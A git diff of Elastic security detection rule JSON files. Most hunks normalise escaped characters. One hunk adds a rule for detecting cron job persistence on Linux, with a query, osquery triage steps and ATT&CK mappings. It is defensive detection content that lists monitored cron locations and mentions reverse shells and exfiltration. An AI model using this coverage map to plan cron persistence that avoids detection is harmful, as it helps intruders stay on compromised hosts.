"Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_1.json b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_1.json index d719b2a55f7..255a39a6a37 100644 --- a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_1.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_2.json b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_2.json index b0a42b1c424..c82a0549c32 100644 --- a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_2.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -116,7 +116,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/fec7ccb7-6ed9-4f98-93ab-d6b366b063a0_1.json b/packages/security_detection_engine/kibana/security_rule/fec7ccb7-6ed9-4f98-93ab-d6b366b063a0_1.json index 23bc610259f..a3594709f0b 100644 --- a/packages/security_detection_engine/kibana/security_rule/fec7ccb7-6ed9-4f98-93ab-d6b366b063a0_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fec7ccb7-6ed9-4f98-93ab-d6b366b063a0_1.json @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_104.json b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_104.json index 38830be6d73..8e3286745fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_104.json +++ b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_105.json b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_105.json index 650d151d8c3..28f57cb8d05 100644 --- a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_105.json +++ b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_106.json b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_106.json index 0c2cc03f539..7ddf7128199 100644 --- a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_106.json +++ b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_106.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_101.json b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_101.json index cf0f8da1de2..a02ddf722ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_101.json +++ b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_101.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_102.json b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_102.json index 72b552ff026..cff37dee840 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_103.json b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_103.json index 09460cc3ed4..c584b957a61 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_103.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_1.json b/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_1.json index ea4add81aca..13b7d30a439 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_1.json @@ -41,7 +41,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_1.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_1.json index 2489fd770a9..93ad15869ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_1.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_2.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_2.json index ef11d47855d..6fa29299181 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_2.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -112,7 +112,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_3.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_3.json index aec110bc0c3..d28bcc09497 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_3.json +++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_3.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -112,7 +112,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_4.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_4.json index 6f3dcaf5d2d..4bb4b4996a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_4.json +++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_4.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -113,7 +113,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_5.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_5.json index ce2cecaf7a0..5ff5dfb304d 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_5.json +++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_5.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -115,7 +115,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_6.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_6.json index 26533b08243..d16205c5d48 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_6.json +++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_6.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -115,7 +115,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_7.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_7.json new file mode 100644 index 00000000000..a2176accb01 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_7.json @@ -0,0 +1,147 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Cron Job Created or Changed by Previously Unknown Process", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Cron Job Created or Changed by Previously Unknown Process\nLinux cron jobs are scheduled tasks that run at specified intervals or times, managed by the cron daemon. \n\nBy creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.\n\nThis rule monitors the creation of previously unknown cron jobs by monitoring for file creation events in the most common cron job task location directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the cron job file that was created or modified.\n- Investigate whether any other files in any of the available cron job directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path LIKE '/etc/cron.allow.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/cron.hourly/%' OR\\n path LIKE '/etc/cron.daily/%' OR\\n path LIKE '/etc/cron.weekly/%' OR\\n path LIKE '/etc/cron.monthly/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (\\n path = '/etc/cron.allow' OR\\n path = '/etc/cron.deny' OR\\n path = '/etc/crontab' OR\\n path = '/usr/sbin/cron' OR\\n path = '/usr/sbin/anacron'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path LIKE '/etc/cron.allow.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/cron.hourly/%' OR\\n path LIKE '/etc/cron.daily/%' OR\\n path LIKE '/etc/cron.weekly/%' OR\\n path LIKE '/etc/cron.monthly/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type : \"linux\" and event.action : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and \nfile.path : (/etc/cron.allow or /etc/cron.deny or /etc/cron.d/* or /etc/cron.hourly/* or /etc/cron.daily/* or \n/etc/cron.weekly/* or /etc/cron.monthly/* or /etc/crontab or /usr/sbin/cron or /usr/sbin/anacron) \nand not (process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"snapd\" or \"yum\" or \"exe\" or \"dnf\" or \"5\") or \nfile.extension : (\"swp\" or \"swpx\"))\n", + "references": [ + "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 7 + }, + "id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_1.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_1.json index 8fbb61a3225..58009da9e2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_2.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_2.json index f1156fa06ea..75dee4330a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_2.json @@ -49,7 +49,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_3.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_3.json index 56b2e2705ef..3faf42081cd 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_3.json +++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_3.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_4.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_4.json index fc34ab01a84..58d8dc6e765 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_4.json +++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_4.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git 